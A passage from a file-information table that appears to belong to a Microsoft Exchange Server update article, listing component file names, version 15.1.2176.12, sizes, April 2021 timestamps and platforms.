applicable \nMce.dll| 15.1.2176.12| 1,693,576| 04-Apr-2021| 10:22| x64 \nMeasure_storeusagestatistics.ps1| Not applicable| 29,487| 04-Apr-2021| 10:23| Not applicable \nMerge_publicfoldermailbox.ps1| Not applicable| 22,639| 04-Apr-2021| 10:24| Not applicable \nMicrosoft.database.isam.dll| 15.1.2176.12| 127,384| 04-Apr-2021| 10:27| x86 \nMicrosoft.dkm.proxy.dll| 15.1.2176.12| 25,976| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.activemonitoring.activemonitoringvariantconfig.dll| 15.1.2176.12| 68,488| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.activemonitoring.eventlog.dll| 15.1.2176.12| 17,792| 04-Apr-2021| 10:23| x64 \nMicrosoft.exchange.addressbook.service.dll| 15.1.2176.12| 232,856| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.addressbook.service.eventlog.dll| 15.1.2176.12| 15,744| 04-Apr-2021| 10:23| x64 \nMicrosoft.exchange.airsync.airsyncmsg.dll| 15.1.2176.12| 43,400| 04-Apr-2021| 10:27| x64 \nMicrosoft.exchange.airsync.comon.dll| 15.1.2176.12| 1,775,512| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.airsync.dll1| 15.1.2176.12| 505,736| 04-Apr-2021| 10:21| Not applicable \nMicrosoft.exchange.airsynchandler.dll| 15.1.2176.12| 76,184| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.anchorservice.dll| 15.1.2176.12| 135,576| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.antispam.eventlog.dll| 15.1.2176.12| 23,432| 04-Apr-2021| 10:23| x64 \nMicrosoft.exchange.antispamupdate.eventlog.dll| 15.1.2176.12| 15,744| 04-Apr-2021| 10:26| x64 \nMicrosoft.exchange.antispamupdatesvc.exe| 15.1.2176.12| 27,032| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.approval.applications.dll| 15.1.2176.12| 53,640| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.assistants.dll| 15.1.2176.12| 924,040| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.assistants.eventlog.dll| 15.1.2176.12| 25,984| 04-Apr-2021| 10:22| x64 \nMicrosoft.exchange.assistants.interfaces.dll| 15.1.2176.12| 42,384| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.audit.azureclient.dll| 15.1.2176.12| 15,232| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.auditlogsearch.eventlog.dll| 15.1.2176.12| 14,720| 04-Apr-2021| 10:23| x64 \nMicrosoft.exchange.auditlogsearchservicelet.dll| 15.1.2176.12| 70,536| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.auditstoragemonitorservicelet.dll| 15.1.2176.12| 94,616| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.auditstoragemonitorservicelet.eventlog.dll| 15.1.2176.12| 13,184| 04-Apr-2021| 10:23| x64 \nMicrosoft.exchange.authadmin.eventlog.dll| 15.1.2176.12| 15,768| 04-Apr-2021| 10:23| x64 \nMicrosoft.exchange.authadminservicelet.dll| 15.1.2176.12| 36,744| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.authservicehostservicelet.dll| 15.1.2176.12| 15,760| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.autodiscover.configuration.dll| 15.1.2176.12| 79,768| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.autodiscover.dll| 15.1.2176.12| 396,184| 04-Apr-2021| 10:21| x86 \nMicrosoft.exchange.autodiscover.eventlogs.dll| 15.1.2176.12| 21,392| 04-Apr-2021| 10:23| x64 \nMicrosoft.exchange.autodiscoverv2.dll| 15.1.2176.12| 57,240| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.bandwidthmonitorservicelet.dll| 15.1.2176.12| 14,744| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.batchservice.dll| 15.1.2176.12| 35,720| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.cabutility.dll| 15.1.2176.12| 276,360| 04-Apr-2021| 10:22| x64 \nMicrosoft.exchange.certificatedeployment.eventlog.dll| 15.1.2176.12| 16,280| 04-Apr-2021| 10:22| x64 \nMicrosoft.exchange.certificatedeploymentservicelet.dll| 15.1.2176.12| 26,008| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.certificatenotification.eventlog.dll| 15.1.2176.12| 13,720| 04-Apr-2021| 10:22| x64 \nMicrosoft.exchange.certificatenotificationservicelet.dll| 15.1.2176.12| 23,440| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.clients.common.dll| 15.1.2176.12| 377,216| 04-Apr-2021| 10:24| x86 \nMicrosoft.exchange.clients.eventlogs.dll| 15.1.2176.12| 83,864| 04-Apr-2021| 10:23| x64 \nMicrosoft.exchange.clients.owa.dll| 15.1.2176.12| 2,970,488| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.clients.owa2.server.dll| 15.1.2176.12| 5,028,760| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.clients.owa2.servervariantconfiguration.dll| 15.1.2176.12| 894,344| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.clients.security.dll| 15.1.2176.12| 413,576| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.clients.strings.dll| 15.1.2176.12| 924,544| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.cluster.bandwidthmonitor.dll| 15.1.2176.12| 31,624| 04-Apr-2021| 10:27| x86 \nMicrosoft.exchange.cluster.common.dll| 15.1.2176.12| 52,120| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.cluster.common.extensions.dll| 15.1.2176.12| 21,896| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.cluster.diskmonitor.dll| 15.1.2176.12| 33,672| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.cluster.replay.dll| 15.1.2176.12| 3,478,392| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.cluster.replicaseeder.dll| 15.1.2176.12| 108,424| 04-Apr-2021| 10:26| x64 \nMicrosoft.exchange.cluster.replicavsswriter.dll| 15.1.2176.12| 288,656| 04-Apr-2021| 10:26| x64 \nMicrosoft.exchange.cluster.shared.dll| 15.1.2176.12| 621,952| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.common.agentconfig.transport.dll| 15.1.2176.12| 86,408| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.common.componentconfig.transport.dll| 15.1.2176.12| 1,827,720| 04-Apr-2021| 10:21| x86 \nMicrosoft.exchange.common.directory.adagentservicevariantconfig.dll| 15.1.2176.12| 31,624| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.common.directory.directoryvariantconfig.dll| 15.1.2176.12| 466,312| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.common.directory.domtvariantconfig.dll| 15.1.2176.12| 26,000| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.common.directory.ismemberofresolverconfig.dll| 15.1.2176.12| 38,280| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.common.directory.tenantrelocationvariantconfig.dll| 15.1.2176.12| 102,792| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.common.directory.topologyservicevariantconfig.dll| 15.1.2176.12| 48,520| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.common.diskmanagement.dll| 15.1.2176.12| 67,456| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.common.dll| 15.1.2176.12| 172,936| 04-Apr-2021| 10:21| x86 \nMicrosoft.exchange.common.encryption.variantconfig.dll| 15.1.2176.12| 113,544| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.common.il.dll| 15.1.2176.12| 13,720| 04-Apr-2021| 10:21| x86 \nMicrosoft.exchange.common.inference.dll| 15.1.2176.12| 130,456| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.common.optics.dll| 15.1.2176.12| 63,872| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.common.processmanagermsg.dll| 15.1.2176.12| 19,848| 04-Apr-2021| 10:26| x64 \nMicrosoft.exchange.common.protocols.popimap.dll| 15.1.2176.12| 15,256| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.common.search.dll| 15.1.2176.12| 107,928| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.common.search.eventlog.dll| 15.1.2176.12| 17,816| 04-Apr-2021| 10:24| x64 \nMicrosoft.exchange.common.smtp.dll| 15.1.2176.12| 51,592| 04-Apr-2021| 10:21| x86 \nMicrosoft.exchange.common.suiteservices.suiteservicesvariantconfig.dll| 15.1.2176.12| 36,744| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.common.transport.azure.dll| 15.1.2176.12| 27,520| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.common.transport.monitoringconfig.dll| 15.1.2176.12| 1,042,296| 04-Apr-2021| 10:21| x86 \nMicrosoft.exchange.commonmsg.dll| 15.1.2176.12| 29,080| 04-Apr-2021| 10:26| x64 \nMicrosoft.exchange.compliance.auditlogpumper.messages.dll| 15.1.2176.12| 13,192| 04-Apr-2021| 10:26| x64 \nMicrosoft.exchange.compliance.auditservice.core.dll| 15.1.2176.12| 181,144| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.compliance.auditservice.messages.dll| 15.1.2176.12| 30,080| 04-Apr-2021| 10:26| x64 \nMicrosoft.exchange.compliance.common.dll| 15.1.2176.12| 22,400| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.compliance.crimsonevents.dll| 15.1.2176.12| 85,896| 04-Apr-2021| 10:22| x64 \nMicrosoft.exchange.compliance.dll| 15.1.2176.12| 41,352| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.compliance.recordreview.dll| 15.1.2176.12| 37,256| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.compliance.supervision.dll| 15.1.2176.12| 50,584| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.compliance.taskcreator.dll| 15.1.2176.12| 33,144| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.compliance.taskdistributioncommon.dll| 15.1.2176.12| 1,100,168| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.compliance.taskdistributionfabric.dll| 15.1.2176.12| 206,720| 04-Apr-2021| 10:21| x86 \nMicrosoft.exchange.compliance.taskplugins.dll| 15.1.2176.12| 210,808| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.compression.dll| 15.1.2176.12| 17,280| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.configuration.certificateauth.dll| 15.1.2176.12| 37,784| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.configuration.certificateauth.eventlog.dll| 15.1.2176.12| 14,216| 04-Apr-2021| 10:23| x64 \nMicrosoft.exchange.configuration.core.dll| 15.1.2176.12| 145,792| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.configuration.core.eventlog.dll| 15.1.2176.12| 14,208| 04-Apr-2021| 10:23| x64 \nMicrosoft.exchange.configuration.delegatedauth.dll| 15.1.2176.12| 53,144| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.configuration.delegatedauth.eventlog.dll| 15.1.2176.12| 15,768| 04-Apr-2021| 10:23| x64 \nMicrosoft.exchange.configuration.diagnosticsmodules.dll| 15.1.2176.12| 23,432| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.configuration.diagnosticsmodules.eventlog.dll| 15.1.2176.12| 13,192| 04-Apr-2021| 10:24| x64 \nMicrosoft.exchange.configuration.failfast.dll| 15.1.2176.12| 54,664| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.configuration.failfast.eventlog.dll| 15.1.2176.12| 13,704| 04-Apr-2021| 10:23| x64 \nMicrosoft.exchange.configuration.objectmodel.dll| 15.1.2176.12| 1,845,120| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.configuration.objectmodel.eventlog.dll| 15.1.2176.12| 30,104| 04-Apr-2021| 10:23| x64 \nMicrosoft.exchange.configuration.redirectionmodule.dll| 15.1.2176.12| 68,488| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.configuration.redirectionmodule.eventlog.dll| 15.1.2176.12| 15,240| 04-Apr-2021| 10:23| x64 \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.dll| 15.1.2176.12| 21,384| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.eventlog.dll| 15.1.2176.12| 13,176| 04-Apr-2021| 10:23| x64 \nMicrosoft.exchange.connectiondatacollector.dll| 15.1.2176.12| 26,000| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.connections.common.dll| 15.1.2176.12| 169,856| 04-Apr-2021| 10:21| x86 \nMicrosoft.exchange.connections.eas.dll| 15.1.2176.12| 330,120| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.connections.imap.dll| 15.1.2176.12| 173,960| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.connections.pop.dll| 15.1.2176.12| 71,048| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.contentfilter.wrapper.exe| 15.1.2176.12| 203,648| 04-Apr-2021| 10:24| x64 \nMicrosoft.exchange.context.client.dll| 15.1.2176.12| 27,000| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.context.configuration.dll| 15.1.2176.12| 51,592| 04-Apr-2021| 10:21| x86 \nMicrosoft.exchange.context.core.dll| 15.1.2176.12| 51,096| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.context.datamodel.dll| 15.1.2176.12| 46,976| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.core.strings.dll| 15.1.2176.12| 1,092,480| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.core.timezone.dll| 15.1.2176.12| 57,208| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.data.applicationlogic.deep.dll| 15.1.2176.12| 326,552| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.data.applicationlogic.dll| 15.1.2176.12| 3,353,472| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.data.applicationlogic.eventlog.dll| 15.1.2176.12| 35,728| 04-Apr-2021| 10:23| x64 \nMicrosoft.exchange.data.applicationlogic.monitoring.ifx.dll| 15.1.2176.12| 17,816| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.data.connectors.dll| 15.1.2176.12| 165,272| 04-Apr-2021| 10:21| x86 \nMicrosoft.exchange.data.consumermailboxprovisioning.dll| 15.1.2176.12| 619,408| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.data.directory.dll| 15.1.2176.12| 7,782,808| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.data.directory.eventlog.dll| 15.1.2176.12| 80,264| 04-Apr-2021| 10:22| x64 \nMicrosoft.exchange.data.dll| 15.1.2176.12| 1,785,736| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.data.groupmailboxaccesslayer.dll| 15.1.2176.12| 1,626,504| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.data.ha.dll| 15.1.2176.12| 362,392| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.data.imageanalysis.dll| 15.1.2176.12| 105,880| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.data.mailboxfeatures.dll| 15.1.2176.12| 15,744| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.data.mailboxloadbalance.dll| 15.1.2176.12| 224,640| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.data.mapi.dll| 15.1.2176.12| 186,776| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.data.metering.contracts.dll| 15.1.2176.12| 39,808| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.data.metering.dll| 15.1.2176.12| 119,176| 04-Apr-2021| 10:21| x86 \nMicrosoft.exchange.data.msosyncxsd.dll| 15.1.2176.12| 968,080| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.data.notification.dll| 15.1.2176.12| 141,184| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.data.personaldataplatform.dll| 15.1.2176.12| 769,432| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.data.providers.dll| 15.1.2176.12| 139,648| 04-Apr-2021| 10:21| x86 \nMicrosoft.exchange.data.provisioning.dll| 15.1.2176.12| 56,728| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.data.rightsmanagement.dll| 15.1.2176.12| 453,008| 04-Apr-2021| 10:27| x86 \nMicrosoft.exchange.data.scheduledtimers.dll| 15.1.2176.12| 32,640| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.data.storage.clientstrings.dll| 15.1.2176.12| 256,408| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.data.storage.dll| 15.1.2176.12| 11,641,736| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.data.storage.eventlog.dll| 15.1.2176.12| 37,784| 04-Apr-2021| 10:22| x64 \nMicrosoft.exchange.data.storageconfigurationresources.dll| 15.1.2176.12| 655,736| 04-Apr-2021| 10:21| x86 \nMicrosoft.exchange.data.storeobjects.dll| 15.1.2176.12| 174,488| 04-Apr-2021| 10:21| x86 \nMicrosoft.exchange.data.throttlingservice.client.dll| 15.1.2176.12| 36,248| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.data.throttlingservice.client.eventlog.dll| 15.1.2176.12| 14,200| 04-Apr-2021| 10:23| x64 \nMicrosoft.exchange.data.throttlingservice.eventlog.dll| 15.1.2176.12| 14,216| 04-Apr-2021| 10:23| x64 \nMicrosoft.exchange.datacenter.management.activemonitoring.recoveryservice.eventlog.dll| 15.1.2176.12| 14,736| 04-Apr-2021| 10:23| x64 \nMicrosoft.exchange.datacenterstrings.dll| 15.1.2176.12| 72,600| 04-Apr-2021| 10:25| x86 \nMicrosoft.exchange.delivery.eventlog.dll| 15.1.2176.12| 13,184| 04-Apr-2021| 10:22| x64 \nMicrosoft.exchange.diagnostics.certificatelogger.dll| 15.1.2176.12| 22,920| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.diagnostics.dll| 15.1.2176.12| 2,210,696| 04-Apr-2021| 10:21| x86 \nMicrosoft.exchange.diagnostics.dll.deploy| 15.1.2176.12| 2,210,696| 04-Apr-2021| 10:21| Not applicable \nMicrosoft.exchange.diagnostics.performancelogger.dll| 15.1.2176.12| 23,936| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.diagnostics.service.common.dll| 15.1.2176.12| 546,704| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.diagnostics.service.eventlog.dll| 15.1.2176.12| 215,424| 04-Apr-2021| 10:26| x64 \nMicrosoft.exchange.diagnostics.service.exchangejobs.dll| 15.1.2176.12| 193,408| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.diagnostics.service.exe| 15.1.2176.12| 146,328| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.diagnostics.service.fuseboxperfcounters.dll| 15.1.2176.12| 27,520| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.diagnosticsaggregation.eventlog.dll| 15.1.2176.12| 13,712| 04-Apr-2021| 10:23| x64 \nMicrosoft.exchange.diagnosticsaggregationservicelet.dll| 15.1.2176.12| 49,544| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.directory.topologyservice.eventlog.dll| 15.1.2176.12| 28,040| 04-Apr-2021| 10:23| x64 \nMicrosoft.exchange.directory.topologyservice.exe| 15.1.2176.12| 208,792| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.disklocker.events.dll| 15.1.2176.12| 88,968| 04-Apr-2021| 10:26| x64 \nMicrosoft.exchange.disklocker.interop.dll| 15.1.2176.12| 32,648| 04-Apr-2021| 10:24| x86 \nMicrosoft.exchange.drumtesting.calendarmigration.dll| 15.1.2176.12| 45,952| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.drumtesting.common.dll| 15.1.2176.12| 18,824| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.dxstore.dll| 15.1.2176.12| 473,480| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.dxstore.ha.events.dll| 15.1.2176.12| 206,208| 04-Apr-2021| 10:26| x64 \nMicrosoft.exchange.dxstore.ha.instance.exe| 15.1.2176.12| 36,736| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.eac.flighting.dll| 15.1.2176.12| 131,464| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.edgecredentialsvc.exe| 15.1.2176.12| 21,888| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.edgesync.common.dll| 15.1.2176.12| 148,344| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.edgesync.datacenterproviders.dll| 15.1.2176.12| 220,040| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.edgesync.eventlog.dll| 15.1.2176.12| 23,944| 04-Apr-2021| 10:23| x64 \nMicrosoft.exchange.edgesyncsvc.exe| 15.1.2176.12| 97,672| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.ediscovery.export.dll| 15.1.2176.12| 1,266,048| 04-Apr-2021| 10:21| x86 \nMicrosoft.exchange.ediscovery.export.dll.deploy| 15.1.2176.12| 1,266,048| 04-Apr-2021| 10:21| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.application| Not applicable| 16,530| 04-Apr-2021| 10:23| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.exe.deploy| 15.1.2176.12| 87,448| 04-Apr-2021| 10:24| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.manifest| Not applicable| 67,483| 04-Apr-2021| 10:23| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.strings.dll.deploy| 15.1.2176.12| 52,096| 04-Apr-2021| 10:23| Not applicable \nMicrosoft.exchange.ediscovery.mailboxsearch.dll| 15.1.2176.12| 294,296| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.entities.birthdaycalendar.dll| 15.1.2176.12| 73,096| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.entities.booking.defaultservicesettings.dll| 15.1.2176.12| 45,952| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.entities.booking.dll| 15.1.2176.12| 218,504| 04-Apr-2021| 10:21| x86 \nMicrosoft.exchange.entities.booking.management.dll| 15.1.2176.12| 78,208| 04-Apr-2021| 10:21| x86 \nMicrosoft.exchange.entities.bookings.dll| 15.1.2176.12| 35,712| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.entities.calendaring.dll| 15.1.2176.12| 932,216| 04-Apr-2021| 10:21| x86 \nMicrosoft.exchange.entities.common.dll| 15.1.2176.12| 336,256| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.entities.connectors.dll| 15.1.2176.12| 52,632| 04-Apr-2021| 10:21| x86 \nMicrosoft.exchange.entities.contentsubmissions.dll| 15.1.2176.12| 32,152| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.entities.context.dll| 15.1.2176.12| 60,816| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.entities.datamodel.dll| 15.1.2176.12| 854,424| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.entities.fileproviders.dll| 15.1.2176.12| 291,736| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.entities.foldersharing.dll| 15.1.2176.12| 39,296| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.entities.holidaycalendars.dll| 15.1.2176.12| 76,168| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.entities.insights.dll| 15.1.2176.12| 166,792| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.entities.meetinglocation.dll| 15.1.2176.12| 1,486,728| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.entities.meetingparticipants.dll| 15.1.2176.12| 122,248| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.entities.meetingtimecandidates.dll| 15.1.2176.12| 12,327,320| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.entities.onlinemeetings.dll| 15.1.2176.12| 264,064| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.entities.people.dll| 15.1.2176.12| 37,784| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.entities.peopleinsights.dll| 15.1.2176.12| 186,760| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.entities.reminders.dll| 15.1.2176.12| 64,392| 04-Apr-2021| 10:24| x86 \nMicrosoft.exchange.entities.schedules.dll| 15.1.2176.12| 83,848| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.entities.shellservice.dll| 15.1.2176.12| 63,864| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.entities.tasks.dll| 15.1.2176.12| 100,248| 04-Apr-2021| 10:21| x86 \nMicrosoft.exchange.entities.xrm.dll| 15.1.2176.12| 144,760| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.entityextraction.calendar.dll| 15.1.2176.12| 270,232| 04-Apr-2021| 10:21| x86 \nMicrosoft.exchange.eserepl.common.dll| 15.1.2176.12| 15,256| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.eserepl.configuration.dll| 15.1.2176.12| 15,752| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.eserepl.dll| 15.1.2176.12| 130,424| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.ews.configuration.dll| 15.1.2176.12| 254,336| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.exchangecertificate.eventlog.dll| 15.1.2176.12| 13,208| 04-Apr-2021| 10:23| x64 \nMicrosoft.exchange.exchangecertificateservicelet.dll| 15.1.2176.12| 37,264| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.extensibility.internal.dll| 15.1.2176.12| 640,904| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.extensibility.partner.dll| 15.1.2176.12| 37,272| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.federateddirectory.dll| 15.1.2176.12| 146,328| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.ffosynclogmsg.dll| 15.1.2176.12| 13,184| 04-Apr-2021| 10:22| x64 \nMicrosoft.exchange.frontendhttpproxy.dll| 15.1.2176.12| 593,792| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.frontendhttpproxy.eventlogs.dll| 15.1.2176.12| 14,720| 04-Apr-2021| 10:23| x64 \nMicrosoft.exchange.frontendtransport.monitoring.dll| 15.1.2176.12| 30,104| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.griffin.variantconfiguration.dll| 15.1.2176.12| 99,720| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.hathirdpartyreplication.dll| 15.1.2176.12| 42,392| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.helpprovider.dll| 15.1.2176.12| 40,344| 04-Apr-2021| 10:24| x86 \nMicrosoft.exchange.httpproxy.addressfinder.dll| 15.1.2176.12| 54,152| 04-Apr-2021| 10:21| x86 \nMicrosoft.exchange.httpproxy.common.dll| 15.1.2176.12| 163,704| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.httpproxy.diagnostics.dll| 15.1.2176.12| 58,744| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.httpproxy.flighting.dll| 15.1.2176.12| 204,168| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.httpproxy.passivemonitor.dll| 15.1.2176.12| 17,808| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.httpproxy.proxyassistant.dll| 15.1.2176.12| 30,592| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.httpproxy.routerefresher.dll| 15.1.2176.12| 38,792| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.httpproxy.routeselector.dll| 15.1.2176.12| 48,504| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.httpproxy.routing.dll| 15.1.2176.12| 180,632| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.httpredirectmodules.dll| 15.1.2176.12| 36,760| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.httputilities.dll| 15.1.2176.12| 25,992| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.hygiene.data.dll| 15.1.2176.12| 1,868,168| 04-Apr-2021| 10:21| x86 \nMicrosoft.exchange.hygiene.diagnosisutil.dll| 15.1.2176.12| 54,680| 04-Apr-2021| 10:21| x86 \nMicrosoft.exchange.hygiene.eopinstantprovisioning.dll| 15.1.2176.12| 35,720| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.idserialization.dll| 15.1.2176.12| 35,728| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.imap4.eventlog.dll| 15.1.2176.12| 18,312| 04-Apr-2021| 10:21| x64 \nMicrosoft.exchange.imap4.eventlog.dll.fe| 15.1.2176.12| 18,312| 04-Apr-2021| 10:21| Not applicable \nMicrosoft.exchange.imap4.exe| 15.1.2176.12| 263,048| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.imap4.exe.fe| 15.1.2176.12| 263,048| 04-Apr-2021| 10:22| Not applicable \nMicrosoft.exchange.imap4service.exe| 15.1.2176.12| 24,984| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.imap4service.exe.fe| 15.1.2176.12| 24,984| 04-Apr-2021| 10:23| Not applicable \nMicrosoft.exchange.imapconfiguration.dl1| 15.1.2176.12| 53,128| 04-Apr-2021| 10:23| Not applicable \nMicrosoft.exchange.inference.common.dll| 15.1.2176.12| 216,960| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.inference.hashtagsrelevance.dll| 15.1.2176.12| 32,136| 04-Apr-2021| 10:26| x64 